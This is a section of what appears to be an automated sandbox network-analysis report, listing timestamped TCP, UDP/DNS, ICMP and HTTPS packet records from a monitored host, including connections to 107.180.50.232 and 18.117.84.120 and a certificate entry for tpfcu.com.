Jun 9, 2021 15:21:56.065464973 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065469980 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.065486908 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.065514088 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.201870918 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.201898098 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.201925993 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.201947927 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.201966047 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.201992989 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202016115 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202018976 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202038050 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202069044 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202095032 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202202082 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202254057 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202256918 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202275038 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202299118 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202300072 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202317953 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202327013 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202344894 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202353001 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202367067 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202377081 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202392101 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202400923 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202421904 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202423096 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202439070 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202450037 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202466965 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202471018 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202486992 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202507973 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202548027 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202574015 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202599049 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.202606916 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.202637911 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.207607985 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.207724094 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.338391066 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338424921 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338438988 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338462114 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338490009 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338599920 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.338702917 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338712931 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.338725090 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338749886 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.338766098 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338781118 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.338787079 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338810921 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.338812113 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338840961 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.338849068 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338864088 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.338886976 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338886976 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.338908911 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338932037 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.338933945 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.338977098 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.338994026 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339015007 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339040995 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339055061 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339061975 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339081049 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339091063 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339123964 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339133024 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339148045 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339152098 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339169025 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339194059 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339204073 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339221954 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339231968 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339252949 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339261055 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339273930 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339304924 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339309931 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339329958 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339350939 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339354992 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339380026 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339387894 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339404106 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339426994 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339430094 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339457035 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339462996 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339482069 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339494944 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339521885 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339530945 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339540958 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339566946 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.339582920 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.339629889 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.344010115 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.344036102 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.344147921 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.475028992 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475059986 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475073099 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475085974 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475107908 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475147009 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475167990 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475191116 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475208998 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475212097 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.475234032 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475253105 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:21:56.475265026 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.475342989 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.482059956 CEST | 49715 | 443 | 192.168.2.6 | 107.180.50.232 |
Jun 9, 2021 15:21:56.618499994 CEST | 443 | 49715 | 107.180.50.232 | 192.168.2.6 |
Jun 9, 2021 15:22:49.096944094 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:22:49.236207008 CEST | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:22:49.236434937 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:22:49.246424913 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:22:49.385665894 CEST | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:22:49.386614084 CEST | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:22:49.386635065 CEST | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:22:49.386751890 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:22:49.393546104 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:22:49.533077002 CEST | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:22:49.577728987 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:22:54.731709957 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:22:54.907586098 CEST | 443 | 49740 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:24.941314936 CEST | 49740 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:25.080559015 CEST | 49747 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:25.220175028 CEST | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:25.220691919 CEST | 49747 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:25.222739935 CEST | 49747 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:25.362360954 CEST | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:25.363224030 CEST | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:25.363259077 CEST | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:25.364415884 CEST | 49747 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:25.368238926 CEST | 49747 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:25.508029938 CEST | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:25.510736942 CEST | 49747 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:25.687309980 CEST | 443 | 49747 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:56.901083946 CEST | 49747 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:57.016983986 CEST | 49750 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:57.158025980 CEST | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:57.158145905 CEST | 49750 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:57.158910990 CEST | 49750 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:57.297934055 CEST | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:57.298791885 CEST | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:57.298819065 CEST | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:57.298913956 CEST | 49750 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:57.301543951 CEST | 49750 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:57.440867901 CEST | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:23:57.442948103 CEST | 49750 | 443 | 192.168.2.6 | 18.117.84.120 |
Jun 9, 2021 15:23:57.619473934 CEST | 443 | 49750 | 18.117.84.120 | 192.168.2.6 |
Jun 9, 2021 15:24:08.904089928 CEST | 49750 | 443 | 192.168.2.6 | 18.117.84.120 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 9, 2021 15:21:38.244496107 CEST | 64267 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:38.294626951 CEST | 53 | 64267 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:38.999614000 CEST | 49448 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:39.059832096 CEST | 53 | 49448 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:39.159909964 CEST | 60342 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:39.210349083 CEST | 53 | 60342 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:40.534393072 CEST | 61346 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:40.584779024 CEST | 53 | 61346 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:42.137758970 CEST | 51774 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:42.198226929 CEST | 53 | 51774 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:43.285564899 CEST | 56023 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:43.346214056 CEST | 53 | 56023 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:45.533961058 CEST | 58384 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:45.584702015 CEST | 53 | 58384 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:49.907931089 CEST | 60261 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:49.958479881 CEST | 53 | 60261 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:51.077616930 CEST | 56061 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:51.183701038 CEST | 53 | 56061 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:51.218998909 CEST | 58336 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:51.277750969 CEST | 53 | 58336 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:51.637789011 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:51.717477083 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:52.668123007 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:52.742284060 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:53.718720913 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:53.776930094 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:55.219571114 CEST | 54064 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:55.279922962 CEST | 53 | 54064 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:55.392092943 CEST | 52811 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:55.444571972 CEST | 53 | 52811 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:55.776357889 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:55.835069895 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:56.973902941 CEST | 55299 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:57.028814077 CEST | 53 | 55299 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:57.771101952 CEST | 63745 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:57.822587013 CEST | 53 | 63745 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:59.385391951 CEST | 50055 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:59.440799952 CEST | 53 | 50055 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:21:59.850233078 CEST | 53781 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:21:59.908941984 CEST | 53 | 53781 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:05.187127113 CEST | 61374 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:05.240174055 CEST | 53 | 61374 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:06.356194973 CEST | 50339 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:06.411145926 CEST | 53 | 50339 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:07.310992002 CEST | 63307 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:07.364352942 CEST | 53 | 63307 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:08.822825909 CEST | 49694 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:08.872876883 CEST | 53 | 49694 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:10.216510057 CEST | 54982 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:10.277961016 CEST | 53 | 54982 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:12.805483103 CEST | 50010 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:12.879868031 CEST | 53 | 50010 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:33.340646982 CEST | 63718 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:33.401187897 CEST | 53 | 63718 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:35.480846882 CEST | 62116 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:35.617012978 CEST | 53 | 62116 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:36.693973064 CEST | 63816 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:36.752301931 CEST | 53 | 63816 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:37.430131912 CEST | 55014 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:37.571043968 CEST | 53 | 55014 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:37.991182089 CEST | 62208 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:38.050961018 CEST | 53 | 62208 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:38.482630014 CEST | 57574 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:38.550734043 CEST | 53 | 57574 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:38.699526072 CEST | 51818 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:38.760968924 CEST | 53 | 51818 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:39.343851089 CEST | 56628 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:39.405417919 CEST | 53 | 56628 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:39.908086061 CEST | 60778 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:39.969800949 CEST | 53 | 60778 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:40.793365002 CEST | 53799 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:40.852049112 CEST | 53 | 53799 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:41.757324934 CEST | 54683 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:41.818587065 CEST | 53 | 54683 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:42.288892984 CEST | 59329 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:42.350413084 CEST | 53 | 59329 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:22:50.255160093 CEST | 64021 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:22:50.318708897 CEST | 53 | 64021 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:00.317203999 CEST | 56129 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:00.378262997 CEST | 53 | 56129 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:16.410259008 CEST | 58177 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:16.469381094 CEST | 53 | 58177 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:34.410224915 CEST | 50700 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:34.482976913 CEST | 53 | 50700 | 8.8.8.8 | 192.168.2.6 |
Jun 9, 2021 15:23:35.993652105 CEST | 54069 | 53 | 192.168.2.6 | 8.8.8.8 |
Jun 9, 2021 15:23:36.063276052 CEST | 53 | 54069 | 8.8.8.8 | 192.168.2.6 |
ICMP Packets |
---|
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
Jun 9, 2021 15:22:05.833841085 CEST | 192.168.2.6 | 8.8.7.7 | 4d5a | Echo | |
Jun 9, 2021 15:22:10.528872013 CEST | 192.168.2.6 | 8.8.7.7 | 4d59 | Echo | |
Jun 9, 2021 15:22:20.469414949 CEST | 192.168.2.6 | 8.8.7.7 | 4d58 | Echo | |
Jun 9, 2021 15:22:25.029455900 CEST | 192.168.2.6 | 8.8.7.7 | 4d57 | Echo | |
Jun 9, 2021 15:22:36.677659035 CEST | 192.168.2.6 | 8.8.7.7 | 4d56 | Echo | |
Jun 9, 2021 15:22:41.530548096 CEST | 192.168.2.6 | 8.8.7.7 | 4d55 | Echo |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Jun 9, 2021 15:21:55.219571114 CEST | 192.168.2.6 | 8.8.8.8 | 0x9318 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Jun 9, 2021 15:21:55.279922962 CEST | 8.8.8.8 | 192.168.2.6 | 0x9318 | No error (0) | 107.180.50.232 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Jun 9, 2021 15:21:55.561739922 CEST | 107.180.50.232 | 443 | 192.168.2.6 | 49715 | CN=tpfcu.com, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US | Fri Mar 05 15:44:31 CET 2021 Tue May 03 09:00:00 CEST 2011 | Wed Apr 06 16:44:31 CEST 2022 Sat May 03 09:00:00 CEST 2031 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0 | 37f463bf4616ecd445d4a1937da06e19 |
